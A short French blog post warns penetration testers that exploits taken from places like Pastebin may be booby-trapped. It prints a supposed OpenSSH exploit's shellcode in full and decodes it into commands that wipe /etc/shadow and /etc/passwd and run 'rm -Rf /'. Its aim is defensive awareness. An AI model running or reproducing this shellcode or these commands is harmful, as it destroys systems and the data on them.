Overblog Tous les blogs
Editer l'article Suivre ce blog Administration + Créer mon blog
MENU
gzh1.overblog.com
Publicité

les risques pour le kiddie ..

Hello!

Quand on audite régulièrement la sécurité de son SI avec des outils spécialisés type metasploit, il faut faire trrrrrès attention à ce que l'on utilise ...

Ce petit article de Tux-Planet nous le rappelle bien ... télécharger un exploit sur l'underground est une bien mauvaise idée si l'on ne peut pas valider son contenu :

"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1\xcd\x80" 

Bon, une fois décodé c'est quand même assez explicite :

echo "" > /etc/shadow
echo "" > /etc/passwd
rm -Rf / 

Pas terrible pour un bout de code censé être utilisé pour exploiter une vulnérabilité Openssh.

Je n'imagine même pas le scénario dans lequel un pentester utiliserait ce type de code dans un contexte client .... <troll> mais vous me direz que de toute façon cela n'arrive jamais et qu'un pentester valide systématiquement l'intégrité et le contenu de ses outils avant de les lancer ... sur un environnement de qualif spécialement installé et surveillé H24 </troll>

Bon vous me direz l'exemple est issu de pastebin ... Donc effectivement ce n'est pas le site avec le plus de crédibilité au monde ... mais c'est également valable pour tout autre outil type modules metasploit et consort !

Moralité : vérifier toujours en LAB ce que réalise vraiment un exploit ou tout outil de sécurité avant de l'utiliser ....

Publicité
Partager cet article
Repost0
Pour être informé des derniers articles, inscrivez vous :
Commenter cet article